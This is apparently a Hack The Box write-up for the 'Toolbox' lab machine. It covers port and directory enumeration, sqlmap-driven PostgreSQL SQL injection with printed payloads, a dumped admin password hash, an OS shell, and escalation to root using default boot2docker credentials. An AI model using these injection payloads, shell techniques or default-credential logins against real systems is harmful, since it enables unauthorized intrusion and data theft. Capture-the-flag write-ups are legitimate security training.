Enumeration

NMAP

Warning: 10.10.10.236 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.236
Host is up (0.076s latency).
Not shown: 57953 closed ports, 7569 filtered ports
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
443/tcp   open  https
445/tcp   open  microsoft-ds
5985/tcp  open  wsman
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 64.86 seconds
Nmap scan report for 10.10.10.236
Host is up (0.11s latency).
Not shown: 994 closed ports
PORT    STATE SERVICE       VERSION
21/tcp  open  ftp           FileZilla ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-r-xr-xr-x 1 ftp ftp      242520560 Feb 18  2020 docker-toolbox.exe
| ftp-syst: 
|_  SYST: UNIX emulated by FileZilla
22/tcp  open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
| ssh-hostkey: 
|   2048 5b:1a:a1:81:99:ea:f7:96:02:19:2e:6e:97:04:5a:3f (RSA)
|   256 a2:4b:5a:c7:0f:f3:99:a1:3a:ca:7d:54:28:76:b2:dd (ECDSA)
|_  256 ea:08:96:60:23:e2:f4:4f:8d:05:b3:18:41:35:23:39 (ED25519)
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
443/tcp open  ssl/http      Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=admin.megalogistic.com/organizationName=MegaLogistic Ltd/stateOrProvinceName=Some-State/countryName=GR
| Not valid before: 2020-02-18T17:45:56
|_Not valid after:  2021-02-17T17:45:56
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -7s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-04-13T11:03:39
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.44 seconds

Gobuster

┌──(bob㉿kali)-[~/htb/toolbox]
└─$ gobuster dir -k -u https://megalogistic.com -w /opt/SecLists/Discovery/Web-Content/raft-large-directories-lowercase.txt -x html,txt,bak    
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     https://megalogistic.com
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /opt/SecLists/Discovery/Web-Content/raft-large-directories-lowercase.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              html,txt,bak
[+] Timeout:                 10s
===============================================================
2021/04/13 07:22:55 Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 323] [--> https://megalogistic.com/images/]
/js                   (Status: 301) [Size: 319] [--> https://megalogistic.com/js/]    
/css                  (Status: 301) [Size: 320] [--> https://megalogistic.com/css/]   
/contact.html         (Status: 200) [Size: 10334]                                     
/blog.html            (Status: 200) [Size: 11609]                                     
/about.html           (Status: 200) [Size: 18491]                                     
/services.html        (Status: 200) [Size: 13264]                                     
/index.html           (Status: 200) [Size: 22357]                                     
/fonts                (Status: 301) [Size: 322] [--> https://megalogistic.com/fonts/] 
/industries.html      (Status: 200) [Size: 16188]                                     
/server-status        (Status: 403) [Size: 282]     
─$ gobuster dir -k -u https://admin.megalogistic.com -w /opt/SecLists/Discovery/Web-Content/raft-large-files-lowercase.txt                      
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     https://admin.megalogistic.com
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /opt/SecLists/Discovery/Web-Content/raft-large-files-lowercase.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/04/13 07:51:39 Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 889]
/license.txt          (Status: 200) [Size: 1107]
/.htaccess            (Status: 403) [Size: 288] 
/style.css            (Status: 200) [Size: 5186]
/.                    (Status: 200) [Size: 889] 
/.html                (Status: 403) [Size: 288] 
/dashboard.php        (Status: 302) [Size: 5862] [--> index.php]
/script.js            (Status: 200) [Size: 4451]                
/.htpasswd            (Status: 403) [Size: 288]                 
/.htm                 (Status: 403) [Size: 288]                 
/.htpasswds           (Status: 403) [Size: 288]                 
/.htgroup             (Status: 403) [Size: 288]                 
/admin.css            (Status: 200) [Size: 17057]               
/.htaccess.bak        (Status: 403) [Size: 288]                 
/.htuser              (Status: 403) [Size: 288]                 
/.ht                  (Status: 403) [Size: 288]                 
/.htc                 (Status: 403) [Size: 288]                 
/.htacess             (Status: 403) [Size: 288]        

Subdomain enum

└─$ ffuf -u https://10.10.10.236 -w /opt/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt -H "Host: FUZZ.megalogistic.com" -fl 522

        /'___\  /'___\           /'___\                                                                               
       /\ \__/ /\ \__/  __  __  /\ \__/                                                                               
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\                                                                              
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/            
         \ \_\   \ \_\  \ \____/  \ \_\                                                                               
          \/_/    \/_/   \/___/    \/_/                                                                               

       v1.3.0 Kali Exclusive <3
________________________________________________                                                                      

 :: Method           : GET                                                                                            
 :: URL              : https://10.10.10.236                                                                           
 :: Wordlist         : FUZZ: /opt/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt
 :: Header           : Host: FUZZ.megalogistic.com
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40                              
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405
 :: Filter           : Response lines: 522    
________________________________________________       
                                                           
admin                   [Status: 200, Size: 889, Words: 134, Lines: 36]
:: Progress: [100000/100000] :: Job [1/1] :: 217 req/sec :: Duration: [0:07:00] :: Errors: 0 ::  

SQL Injection

First attempt Since we know from bypassing the login prompt that the DB is vulnerable to SQL injection, we continue poking at it with SQLmap.

sqlmap -r req.txt --batch --force-ssl 


[...]


[*] starting @ 09:16:08 /2021-04-13/

[09:16:08] [INFO] parsing HTTP request from 'req.txt'
[09:16:08] [INFO] resuming back-end DBMS 'postgresql' 
[09:16:08] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: username=-7486' OR 9670=9670-- iBIe&password=asd

    Type: error-based
    Title: PostgreSQL AND error-based - WHERE or HAVING clause
    Payload: username=asdf' AND 2433=CAST((CHR(113)||CHR(120)||CHR(120)||CHR(112)||CHR(113))||(SELECT (CASE WHEN (2433=2433) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(112)||CHR(120)||CHR(106)||CHR(113)) AS NUMERIC)-- CBFU&password=asd

    Type: stacked queries
    Title: PostgreSQL > 8.1 stacked queries (comment)
    Payload: username=asdf';SELECT PG_SLEEP(5)--&password=asd

    Type: time-based blind
    Title: PostgreSQL > 8.1 AND time-based blind
    Payload: username=asdf' AND 3770=(SELECT 3770 FROM PG_SLEEP(5))-- UzvQ&password=asd
---
[09:16:09] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Linux Debian 10 (buster)
web application technology: PHP 7.3.14, Apache 2.4.38
back-end DBMS: PostgreSQL
[09:16:09] [WARNING] schema names are going to be used on PostgreSQL for enumeration as the counterpart to database names on other DBMSes
[09:16:09] [INFO] fetching database (schema) names
[09:16:10] [INFO] retrieved: 'public'
[09:16:10] [INFO] retrieved: 'pg_catalog'
[09:16:11] [INFO] retrieved: 'information_schema'
available databases [3]:
[*] information_schema
[*] pg_catalog
[*] public

From enumerating the tables, public seems interesting as it contains users


sqlmap -r req.txt --batch --force-ssl -D public --dump 

[...]

back-end DBMS: PostgreSQL
[09:18:39] [INFO] fetching tables for database: 'public'
[09:18:39] [INFO] resumed: 'users'
[09:18:39] [INFO] fetching columns for table 'users' in database 'public'
[09:18:40] [INFO] retrieved: 'password'
[09:18:40] [INFO] retrieved: 'varchar'
[09:18:40] [INFO] retrieved: 'username'
[09:18:41] [INFO] retrieved: 'varchar'
[09:18:41] [INFO] fetching entries for table 'users' in database 'public'
[09:18:41] [INFO] retrieved: '4a100a85cb5ca3616dcf137918550815'
[09:18:42] [INFO] retrieved: 'admin'
[09:18:42] [INFO] recognized possible password hashes in column 'password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] N
do you want to crack them via a dictionary-based attack? [Y/n/q] Y
[09:18:42] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[09:18:42] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] N
[09:18:42] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[09:18:42] [INFO] starting 2 processes 
[09:19:15] [WARNING] no clear password(s) found                                                                                                                                                                                             
Database: public
Table: users
[1 entry]
+----------------------------------+----------+
| password                         | username |
+----------------------------------+----------+
| 4a100a85cb5ca3616dcf137918550815 | admin    |
+----------------------------------+----------+

[09:19:15] [INFO] table 'public.users' dumped to CSV file '/home/bob/.local/share/sqlmap/output/admin.megalogistic.com/dump/public/users.csv'
[09:19:15] [INFO] fetched data logged to text files under '/home/bob/.local/share/sqlmap/output/admin.megalogistic.com'

[*] ending @ 09:19:15 /2021-04-13/

We get command execution ..

└─$ sqlmap -r req.txt --force-ssl --os-shell

[...]

And land a shell

We get use find to find a potential user flag

find / -type f -name user.txt 2>/dev/null
</11/main$ find / -type f -name user.txt 2>/dev/null
/var/lib/postgresql/user.txt
postgres@bc56e3cc55e9:/var/lib/postgresql/11/main$ 

User flag down!

From deepce +] Kernel .................. 4.14.154-boot2docker.

From the documentation

We learn that there are a pair of default creds.

If we try this creds

tcuser@172.17.0.1: Permission denied (publickey,password,keyboard-interactive).
ssh docker@172.17.0.1
ssh docker@172.17.0.1
tcuser

   ( '>')
  /) TC (\   Core is distributed with ABSOLUTELY NO WARRANTY.
 (/-_--_-\)           www.tinycorelinux.net

docker@box:~$ 

with sudo -l

User docker may run the following commands on this host:
    (root) NOPASSWD: ALL
sudo bash -p
sudo bash -p
whoami
whoami
root
root@box:/home/docker#   

Since this is running on Windows, we can get to the hosts file system at /c/.

docker@box:/c/Users/Administrator/Desktop$   ls
desktop.ini  root.txt